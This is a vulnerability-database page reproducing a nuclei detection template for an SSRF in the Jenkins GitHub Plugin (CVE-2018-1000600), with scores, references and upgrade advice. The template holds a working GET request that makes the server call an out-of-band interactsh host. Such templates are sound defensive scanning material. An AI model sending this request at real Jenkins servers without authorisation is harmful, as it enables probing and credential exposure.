Lucene search
K

Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 72 Views

Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery allows unauthorized access to internal resources and potential data leakage. Upgrade to version 1.29.2 or later

Related
Refs
Code
id: CVE-2018-1000600

info:
  name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery
  author: geeknik
  severity: high
  description: |
    Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.
  remediation: |
    Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.
  reference:
    - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
    - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000600
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-1000600
    cwe-id: CWE-200
    epss-score: 0.90894
    epss-percentile: 0.99794
    cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*
  metadata:
    max-request: 1
    vendor: jenkins
    product: github
    framework: jenkins
  tags: cve,cve2018,jenkins,ssrf,oast,github,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100bdbb777a60848b570a84e143f80273262d3c612dd3ad6200a56061d816b0382f022100a87de8985a2ea00bb8560ecf7c6f0f7f92e05119cbc9380fa5877e14e11b36f1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 24.3
CVSS 38.8
EPSS0.90894
72